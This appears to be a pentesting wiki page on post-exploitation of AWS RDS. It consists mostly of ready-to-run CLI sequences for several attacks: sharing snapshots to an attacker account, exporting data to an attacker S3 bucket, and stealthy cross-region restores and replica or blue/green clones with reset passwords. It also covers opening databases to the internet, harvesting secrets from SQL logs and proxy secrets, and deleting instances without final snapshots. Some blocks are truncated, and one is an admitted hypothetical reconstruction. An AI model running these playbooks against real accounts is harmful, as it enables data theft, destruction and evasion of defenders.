AWS - RDS Post Exploitation


RDS

For more information check:

AWS - Relational Database (RDS) Enum

rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance

If an attacker has enough permissions, he could make a DB publicly accessible by creating a snapshot of the DB and then restoring a publicly accessible DB from that snapshot.

aws rds describe-db-instances # Get DB identifier

aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat

# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <snapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>

aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# Connect to the new DB after a few mins

rds:StopDBCluster & rds:StopDBInstance

An attacker with the rds:StopDBCluster or rds:StopDBInstance permission can force an immediate stop of an RDS instance or of an entire cluster, making the database unavailable, dropping connections and interrupting any processes that rely on it.

To stop a single DB instance (example):

aws rds stop-db-instance \
--db-instance-identifier <DB_INSTANCE_IDENTIFIER>

To stop an entire DB cluster (example):

aws rds stop-db-cluster \
--db-cluster-identifier <DB_CLUSTER_IDENTIFIER>

rds:Modify*

An attacker granted rds:Modify* can alter critical configuration and auxiliary resources (parameter groups, option groups, proxy endpoints and endpoint-groups, target groups, subnet groups, capacity settings, snapshot/cluster attributes, certificates, integrations, etc.) without directly touching the instances or clusters. Changes such as tweaking connection/time-out parameters, repointing a proxy endpoint, modifying which certificates are trusted, changing logical capacity or reconfiguring a subnet group can weaken security (opening new access paths), break routing and load balancing, invalidate replication/backup strategies, and generally degrade availability or recoverability. These modifications can also enable indirect data exfiltration or hinder an orderly recovery of the database after an incident.

Move or change the subnets assigned to an RDS subnet group:

aws rds modify-db-subnet-group \
--db-subnet-group-name <db-subnet-group-name> \
--subnet-ids <subnet-id-1> <subnet-id-2>

Change low-level engine parameters in a cluster parameter group:

aws rds modify-db-cluster-parameter-group \
--db-cluster-parameter-group-name <parameter-group-name> \
--parameters "ParameterName=<parameter-name>,ParameterValue=<value>,ApplyMethod=immediate"

rds:Restore*

An attacker with rds:Restore* permissions can restore entire databases from snapshots, automated backups, point-in-time recovery (PITR) or files stored in S3, creating new instances or clusters populated with data from the chosen moment. These operations do not overwrite the original resources; they create new objects containing historical data, which lets the attacker obtain full, working copies of the database (from past points in time or from external S3 files) and use them to exfiltrate data, tamper with history or rebuild previous states.

Restore a DB instance to a specific point in time:

aws rds restore-db-instance-to-point-in-time \
--source-db-instance-identifier <source-db-instance-identifier> \
--target-db-instance-identifier <target-db-instance-identifier> \
--restore-time "<restore-time-ISO8601>" \
--db-instance-class <db-instance-class> \
--publicly-accessible --no-multi-az
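
For Aurora, the cluster-level equivalent is `restore-db-cluster-to-point-in-time`; a hedged sketch (identifiers are placeholders, and the restored cluster needs a writer instance before it can be queried):

```bash
aws rds restore-db-cluster-to-point-in-time \
--source-db-cluster-identifier <source-cluster-id> \
--db-cluster-identifier <new-cluster-id> \
--use-latest-restorable-time

# The restored cluster has no instances yet; add a writer matching the cluster engine
aws rds create-db-instance \
--db-instance-identifier <new-cluster-id>-writer \
--db-cluster-identifier <new-cluster-id> \
--db-instance-class db.t3.medium \
--engine aurora-mysql
```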

rds:Delete*

An attacker granted rds:Delete* can delete RDS resources: DB instances, clusters, snapshots, automated backups, subnet groups, parameter/option groups and related artifacts, causing immediate service outage, data loss, destruction of recovery points and loss of forensic evidence.

# Delete a DB instance (creates a final snapshot unless you skip it)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--final-db-snapshot-identifier <FINAL_SNAPSHOT_ID>     # omit or replace with --skip-final-snapshot to avoid snapshot

# Delete a DB instance and skip final snapshot (more destructive)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--skip-final-snapshot

# Delete a manual DB snapshot
aws rds delete-db-snapshot \
--db-snapshot-identifier <DB_SNAPSHOT_ID>

# Delete an Aurora DB cluster (creates a final snapshot unless you skip)
aws rds delete-db-cluster \
--db-cluster-identifier <DB_CLUSTER_ID> \
--final-db-snapshot-identifier <FINAL_CLUSTER_SNAPSHOT_ID>   # or use --skip-final-snapshot

rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot

An attacker with these permissions could create a snapshot of a DB and make it publicly available. Then, he could just create a DB from that snapshot in his own account.

If the attacker doesn't have rds:CreateDBSnapshot, he can still make other already created snapshots public.

# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>

# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
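
From the attacker account, the shared snapshot can then be copied and restored; a minimal hedged sketch (snapshot ARN and identifiers are placeholders, and it assumes an unencrypted snapshot):

```bash
# Run these from the attacker account, in the same region as the shared snapshot
aws rds copy-db-snapshot \
--source-db-snapshot-identifier arn:aws:rds:<region>:<victim-account-id>:snapshot:<snapshot-name> \
--target-db-snapshot-identifier stolen-copy

aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier restored-from-victim \
--db-snapshot-identifier stolen-copy \
--publicly-accessible
```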

rds:DownloadDBLogFilePortion

An attacker with the rds:DownloadDBLogFilePortion permission can download portions of an RDS instance's log files. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate privileges or perform unauthorized actions.

aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
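
To go beyond a single file, a small hedged sketch that first enumerates every available log file and then pulls each of them (the instance name follows the example above):

```bash
# List available log files (names, sizes, last written)
aws rds describe-db-log-files \
--db-instance-identifier target-instance \
--query 'DescribeDBLogFiles[*].[LogFileName,Size,LastWritten]' \
--output table

# Download every log file; the CLI paginates the portions under the hood
for f in $(aws rds describe-db-log-files --db-instance-identifier target-instance \
--query 'DescribeDBLogFiles[*].LogFileName' --output text); do
  aws rds download-db-log-file-portion --db-instance-identifier target-instance \
    --log-file-name "$f" --starting-token 0 --output text > "${f//\//_}"
done
```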

Potential Impact: Access to sensitive information or unauthorized actions using leaked credentials.

rds:DeleteDBInstance

An attacker with these permissions can DoS existing RDS instances.

# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot

Potential Impact: Deletion of existing RDS instances and potential loss of data.

rds:StartExportTask

Note

TODO: Test

An attacker with this permission could export an RDS instance snapshot to an S3 bucket. If the attacker controls the destination S3 bucket, they may be able to access sensitive data within the exported snapshot.

aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
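
The export runs asynchronously and lands as Parquet under the export task name; a hedged sketch to poll the task and browse the resulting objects (names follow the example above):

```bash
# Poll until the export finishes (Status becomes COMPLETE)
aws rds describe-export-tasks \
--export-task-identifier attacker-export-task \
--query 'ExportTasks[0].Status' --output text

# Browse the exported Parquet files in the attacker-controlled bucket
aws s3 ls s3://attacker-bucket/attacker-export-task/ --recursive
```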

Potential Impact: Access to sensitive data in the exported snapshot.

Cross-region automated backups replication for stealthy restore (rds:StartDBInstanceAutomatedBackupsReplication)

Abuse cross-region automated backups replication to silently copy an RDS instance's automated backups into another AWS region and restore them there. The attacker can then make the restored DB publicly accessible and reset the master password, accessing the data through an out-of-region channel that defenders are likely not monitoring.

Permissions needed (minimum):

  • rds:StartDBInstanceAutomatedBackupsReplication in the destination region
  • rds:DescribeDBInstanceAutomatedBackups in the destination region
  • rds:RestoreDBInstanceToPointInTime in the destination region
  • rds:ModifyDBInstance in the destination region
  • rds:StopDBInstanceAutomatedBackupsReplication (optional cleanup)
  • ec2:CreateSecurityGroup and ec2:AuthorizeSecurityGroupIngress (to expose the restored DB)

Impact: Persistence and data exfiltration by restoring a copy of the production data into another region and exposing it publicly with attacker-controlled credentials.

End-to-end CLI (replace the placeholders):

```bash
# 1) Recon (SOURCE region A)
aws rds describe-db-instances \
--region <SOURCE_REGION> \
--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,DBInstanceStatus,PreferredBackupWindow]' \
--output table

# 2) Start cross-Region automated backups replication (run in DEST region B)
aws rds start-db-instance-automated-backups-replication \
--region <DEST_REGION> \
--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN> \
--source-region <SOURCE_REGION> \
--backup-retention-period 7

# 3) Wait for replication to be ready in DEST
aws rds describe-db-instance-automated-backups \
--region <DEST_REGION> \
--query 'DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]' \
--output table
# Proceed when Status is "replicating" or "active" and note the DBInstanceAutomatedBackupsArn

# 4) Restore to latest restorable time in DEST
aws rds restore-db-instance-to-point-in-time \
--region <DEST_REGION> \
--source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN> \
--target-db-instance-identifier <TARGET_DB_ID> \
--use-latest-restorable-time \
--db-instance-class db.t3.micro
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 5) Make public and reset credentials in DEST
# 5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)
OPEN_SG_ID=$(aws ec2 create-security-group --region <DEST_REGION> \
--group-name open-rds- --description open --vpc-id <DEST_VPC_ID> \
--query GroupId --output text)
aws ec2 authorize-security-group-ingress --region <DEST_REGION> \
--group-id "$OPEN_SG_ID" \
--ip-permissions 'IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges=[{CidrIp=0.0.0.0/0}]'

# 5b) Publicly expose restored DB and attach the SG
aws rds modify-db-instance --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--publicly-accessible \
--vpc-security-group-ids "$OPEN_SG_ID" \
--apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 5c) Reset the master password
aws rds modify-db-instance --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--master-user-password '<NEW_STRONG_PASSWORD>' \
--apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>

# 6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)
ENDPOINT=$(aws rds describe-db-instances --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--query 'DBInstances[0].Endpoint.Address' --output text)
mysql -h "$ENDPOINT" -u <MASTER_USERNAME> -p'<NEW_STRONG_PASSWORD>' -e 'SHOW DATABASES;'

# 7) Optional: stop replication
aws rds stop-db-instance-automated-backups-replication \
--region <DEST_REGION> \
--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>
```


### Enable full SQL logging via DB Parameter Groups and exfiltrate via the RDS log APIs

Abuse `rds:ModifyDBParameterGroup` together with the RDS log download APIs to capture every SQL statement executed by the application (no DB engine credentials needed). Enable the engine's SQL logging and pull the log files via `rds:DescribeDBLogFiles` and `rds:DownloadDBLogFilePortion` (or the REST `downloadCompleteLogFile`). Useful to harvest queries that may contain secrets/PII/JWTs.

Permissions needed (minimum):
- `rds:DescribeDBInstances`, `rds:DescribeDBLogFiles`, `rds:DownloadDBLogFilePortion`
- `rds:CreateDBParameterGroup`, `rds:ModifyDBParameterGroup`
- `rds:ModifyDBInstance` (only to attach a custom parameter group if the instance is using the default one)
- `rds:RebootDBInstance` (for parameters requiring reboot, e.g., PostgreSQL)

Steps
1) Recon the target and its current parameter group
```bash
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBParameterGroups[0].DBParameterGroupName]' \
--output table
```

2) Make sure a custom DB parameter group is attached (the default one cannot be edited)
- If the instance already uses a custom group, reuse its name in the next step.
- Otherwise create and attach one matching the engine family:
```bash
# Example for PostgreSQL 16
aws rds create-db-parameter-group \
--db-parameter-group-name ht-logs-pg \
--db-parameter-group-family postgres16 \
--description "HT logging"

aws rds modify-db-instance \
--db-instance-identifier <DB> \
--db-parameter-group-name ht-logs-pg \
--apply-immediately
# Wait until status becomes "available"
```

3) Enable verbose SQL logging
- MySQL engines (immediate / no reboot needed):
```bash
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=1,ApplyMethod=immediate" \
"ParameterName=log_output,ParameterValue=FILE,ApplyMethod=immediate"
# Optional extras:
#   "ParameterName=slow_query_log,ParameterValue=1,ApplyMethod=immediate" \
#   "ParameterName=long_query_time,ParameterValue=0,ApplyMethod=immediate"
```
- PostgreSQL engines (reboot required):
```bash
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=all,ApplyMethod=pending-reboot"
# Optional to log duration for every statement:
#   "ParameterName=log_min_duration_statement,ParameterValue=0,ApplyMethod=pending-reboot"

# Reboot if any parameter is pending-reboot
aws rds reboot-db-instance --db-instance-identifier <DB>
```

4) Let the workload run (or generate queries). Statements are written to the engine file logs
- MySQL: general/mysql-general.log
- PostgreSQL: postgresql.log

5) Discover and download the logs (no DB creds needed)
```bash
aws rds describe-db-log-files --db-instance-identifier <DB>

# Pull full file via portions (iterate until AdditionalDataPending=false). For small logs a single call is enough:
aws rds download-db-log-file-portion \
--db-instance-identifier <DB> \
--log-file-name general/mysql-general.log \
--starting-token 0 \
--output text > dump.log
```

6) Analyze offline for sensitive data
```bash
grep -Ei "password=|aws_access_key_id|secret|authorization:|bearer" dump.log | sed 's/\(aws_access_key_id=\)[A-Z0-9]*/\1AKIA.../; s/\(secret=\).*/\1REDACTED/; s/\(Bearer \).*/\1REDACTED/' | head
```

Example evidence (redacted):

2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('user=alice password=Sup3rS3cret!')
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('authorization: Bearer REDACTED')
2025-10-06T..Z    13 Query  INSERT INTO t(note) VALUES ('aws_access_key_id=AKIA... secret=REDACTED')

Cleanup

- Revert the parameters to their default values and reboot if needed:
# MySQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=0,ApplyMethod=immediate"

# PostgreSQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=none,ApplyMethod=pending-reboot"
# Reboot if pending-reboot

Impact: Post-exploitation data access by capturing all of the application's SQL statements via AWS APIs (no DB creds), potentially leaking secrets, JWTs and PII.

rds:CreateDBInstanceReadReplica, rds:ModifyDBInstance

Abusing RDS read replicas provides out-of-band read access without touching the primary's credentials. An attacker can create a read replica from a production instance, reset the master password on the replica (this does not change the primary) and optionally expose the replica publicly to exfiltrate the data.

Permissions needed (minimum):

  • rds:DescribeDBInstances
  • rds:CreateDBInstanceReadReplica
  • rds:ModifyDBInstance
  • ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress (if exposing it publicly)

Impact: Read-only access to the production data through a replica with attacker-controlled credentials; detection is less likely since the primary stays untouched and replication keeps running.

# 1) Recon: find non-Aurora sources with backups enabled
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBInstanceArn,DBSubnetGroup.DBSubnetGroupName,VpcSecurityGroups[0].VpcSecurityGroupId,PubliclyAccessible]' \
--output table

# 2) Create a permissive SG (replace <VPC_ID> and <YOUR_IP/32>)
aws ec2 create-security-group --group-name rds-repl-exfil --description 'RDS replica exfil' --vpc-id <VPC_ID> --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id <SGID> --ip-permissions '[{"IpProtocol":"tcp","FromPort":3306,"ToPort":3306,"IpRanges":[{"CidrIp":"<YOUR_IP/32>","Description":"tester"}]}]'

# 3) Create the read replica (optionally public)
aws rds create-db-instance-read-replica \
--db-instance-identifier <REPL_ID> \
--source-db-instance-identifier <SOURCE_DB> \
--db-instance-class db.t3.medium \
--publicly-accessible \
--vpc-security-group-ids <SGID>
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>

# 4) Reset ONLY the replica master password (primary unchanged)
aws rds modify-db-instance --db-instance-identifier <REPL_ID> --master-user-password 'NewStr0ng!Passw0rd' --apply-immediately
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>

# 5) Connect and dump (use the SOURCE master username + NEW password)
REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID> --query 'DBInstances[0].Endpoint.Address' --output text)
# e.g., with mysql client:  mysql -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' -e 'SHOW DATABASES; SELECT @@read_only, CURRENT_USER();'

# Optional: promote for persistence
# aws rds promote-read-replica --db-instance-identifier <REPL_ID>

Example evidence (MySQL):

  • Replica DB status: available, read replication: replicating
  • Successful connection with the new password; access to the read-only replica confirmed via @@read_only=1.

rds:CreateBlueGreenDeployment, rds:ModifyDBInstance

Abuse RDS Blue/Green to clone the production DB into a continuously replicated, read-only green environment. Then reset the green master credentials to access the data without touching the blue (prod) instance. This is stealthier than snapshot sharing and often bypasses monitoring focused on the source.

# 1) Recon – find eligible source (non‑Aurora MySQL/PostgreSQL in the same account)
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'

# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version

# 2) Create Blue/Green deployment (replicates blue->green continuously)
aws rds create-blue-green-deployment \
--blue-green-deployment-name ht-bgd-attack \
--source <BLUE_DB_ARN>
# Optional to upgrade: --target-engine-version <same-or-higher-compatible>

# Wait until deployment Status becomes AVAILABLE, then note the green DB id
aws rds describe-blue-green-deployments \
--blue-green-deployment-identifier <BGD_ID> \
--query 'BlueGreenDeployments[0].SwitchoverDetails[0].TargetMember'

# Typical green id: <blue>-green-XXXX

# 3) Reset the green master password (does not affect blue)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--master-user-password 'Gr33n!Exfil#1' \
--apply-immediately

# Optional: expose the green for direct access (attach an SG that allows the DB port)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--publicly-accessible \
--vpc-security-group-ids <SG_ALLOWING_DB_PORT> \
--apply-immediately

# 4) Connect to the green endpoint and query/exfiltrate (green is read‑only)
aws rds describe-db-instances \
--db-instance-identifier <GREEN_DB_ID> \
--query 'DBInstances[0].Endpoint.Address' --output text

# Then connect with the master username and the new password and run SELECT/dumps
# e.g. MySQL: mysql -h <endpoint> -u <master_user> -p'Gr33n!Exfil#1'

# 5) Cleanup – remove blue/green and the green resources
aws rds delete-blue-green-deployment \
--blue-green-deployment-identifier <BGD_ID> \
--delete-target

Impact: Read-only, but full access to a near-real-time clone of production without modifying the production instance. Ideal for stealthy data extraction and offline analysis.

Out-of-band SQL via RDS Data API by enabling HTTP endpoint + resetting master password

Abuse Aurora by enabling the RDS Data API HTTP endpoint on the target cluster, resetting the master password to a value you control, and executing SQL over HTTPS (no VPC network path required). Works on Aurora engines that support the Data API/EnableHttpEndpoint (e.g., Aurora MySQL 8.0 provisioned; certain Aurora PostgreSQL/MySQL versions).

Minimum permissions:

  • rds:DescribeDBClusters, rds:ModifyDBCluster (or rds:EnableHttpEndpoint)
  • secretsmanager:CreateSecret
  • rds-data:ExecuteStatement (and rds-data:BatchExecuteStatement if used)

Impact: Bypasses network segmentation and exfiltrates data through AWS APIs without any direct VPC connectivity to the DB.

End-to-end CLI (Aurora MySQL example):

```bash
# 1) Identify target cluster ARN
REGION=us-east-1
CLUSTER_ID=<CLUSTER_ID>
CLUSTER_ARN=$(aws rds describe-db-clusters --region $REGION \
--db-cluster-identifier $CLUSTER_ID \
--query 'DBClusters[0].DBClusterArn' --output text)

# 2) Enable Data API HTTP endpoint on the cluster
# Either of the following (depending on API/engine support):
aws rds enable-http-endpoint --region $REGION --resource-arn "$CLUSTER_ARN"
# or
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--enable-http-endpoint --apply-immediately

# Wait until HttpEndpointEnabled is True
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
--query 'DBClusters[0].HttpEndpointEnabled' --output text

# 3) Reset master password to attacker-controlled value
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--master-user-password 'Sup3rStr0ng!1' --apply-immediately

# Wait until pending password change is applied
while :; do
  aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
  P=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
    --query 'DBClusters[0].PendingModifiedValues.MasterUserPassword' --output text)
  [[ "$P" == "None" || "$P" == "null" ]] && break
  sleep 10
done

# 4) Create a Secrets Manager secret for Data API auth
SECRET_ARN=$(aws secretsmanager create-secret --region $REGION --name rdsdata/demo-$CLUSTER_ID \
--secret-string '{"username":"admin","password":"Sup3rStr0ng!1"}' \
--query ARN --output text)

# 5) Prove out-of-band SQL via HTTPS using rds-data
# (Example with Aurora MySQL; for PostgreSQL, adjust SQL and username accordingly)
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database mysql --sql "create database if not exists demo;"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo --sql "create table if not exists pii(note text);"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo --sql "insert into pii(note) values ('token=SECRET_JWT');"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo \
--sql "select current_user(), now(), (select count(*) from pii) as row_count;" \
--format-records-as JSON
```

Notes:
- If rds-data rejects multi-statement SQL, issue separate execute-statement calls.
- For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn instead.
- Make sure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will stay False.


### Obtain DB credentials via RDS Proxy auth secrets (`rds:DescribeDBProxies` + `secretsmanager:GetSecretValue`)

Abuse the RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read that secret to obtain database credentials. Many environments grant broad `secretsmanager:GetSecretValue`, making this a low-friction pivot to DB credentials. If the secret uses a CMK, badly scoped KMS permissions may also allow `kms:Decrypt`.

Permissions needed (minimum):
- `rds:DescribeDBProxies`
- `secretsmanager:GetSecretValue` on the referenced SecretArn
- Optional when the secret uses a CMK: `kms:Decrypt` on that key

Impact: Immediate disclosure of the DB username/password configured on the proxy; direct database access or further lateral movement.

Steps
```bash
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
--query 'DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn]' \
--output table

# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
--secret-id <SecretArnFromProxy> \
--query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}
```

Lab (minimal repro)

REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
--region $REGION --name rds/proxy/aurora-demo \
--secret-string '{"username":"admin","password":"S3cr3t!"}' \
--query ARN --output text)
aws iam create-role --role-name rds-proxy-secret-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"rds.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name rds-proxy-secret-role \
--policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
--auth '[{"AuthScheme":"SECRETS","SecretArn":"'"$SECRET_ARN"'"}]' \
--role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
--vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query 'Subnets[].SubnetId' --output text)
aws rds wait db-proxy-available --db-proxy-name p0
# Now run the enumeration + secret read from the Steps above

Cleanup (lab)

aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery

Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)

Abuse Aurora PostgreSQL zero‑ETL integrations to continuously replicate production data into a Redshift Serverless namespace under your control. If a permissive Redshift resource policy allows CreateInboundIntegration/AuthorizeInboundIntegration for the specific Aurora cluster ARN, an attacker can establish a near-real-time copy of the data without DB creds, snapshots or network exposure.

Permissions needed (minimum):

  • rds:CreateIntegration, rds:DescribeIntegrations, rds:DeleteIntegration
  • redshift:PutResourcePolicy, redshift:DescribeInboundIntegrations, redshift:DescribeIntegrations
  • redshift-data:ExecuteStatement/GetStatementResult/ListDatabases (to query)
  • rds-data:ExecuteStatement (optional; to seed data if needed)

Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.

1) Create the Redshift Serverless namespace + workgroup
```bash
REGION=us-east-1
RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \
--admin-username adminuser --admin-user-password 'AdminPwd-1!' \
--query namespace.namespaceArn --output text)
RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \
--namespace-name ztl-ns --base-capacity 8 --publicly-accessible \
--query workgroup.workgroupArn --output text)
# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL)
aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \
--config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true
```

2) Configure the Redshift resource policy to allow the Aurora source
```bash
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SRC_ARN=
cat > rs-rp.json <
```
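
The policy document itself is truncated above. What follows is only a hedged, illustrative sketch of what such a permissive resource policy and the corresponding `put-resource-policy` call could look like; the exact statements and principals required by zero-ETL should be verified against the AWS documentation:

```bash
# Hypothetical reconstruction - adjust principals/actions to the actual zero-ETL requirements
SRC_ARN=<AURORA_CLUSTER_ARN>   # the Aurora cluster ARN (obtained in step 3 below)
cat > rs-rp.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "Service": "redshift.amazonaws.com" },
      "Action": "redshift:AuthorizeInboundIntegration",
      "Condition": { "StringEquals": { "aws:SourceArn": "$SRC_ARN" } }
    },
    {
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::$ACCOUNT_ID:root" },
      "Action": "redshift:CreateInboundIntegration"
    }
  ]
}
EOF

aws redshift put-resource-policy \
--region $REGION \
--resource-arn "$RS_NS_ARN" \
--policy file://rs-rp.json
```
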
3) Create the Aurora PostgreSQL cluster (Data API and logical replication enabled)
```bash
CLUSTER_ID=aurora-ztl
aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--engine aurora-postgresql --engine-version 16.4 \
--master-username postgres --master-user-password 'InitPwd-1!' \
--enable-http-endpoint --no-deletion-protection --backup-retention-period 1
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID

# Serverless v2 instance
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately
aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \
--db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1

# Cluster parameter group for zero-ETL
aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \
--db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params"
aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \
ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \
ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately
aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text)
```

4) Create the zero-ETL integration from RDS
```bash
# Include all tables in the default 'postgres' database
aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \
--target-arn "$RS_NS_ARN" --integration-name ztl-demo \
--data-filter 'include: postgres.*.*'

# Redshift inbound integration should become ACTIVE
aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN"
```

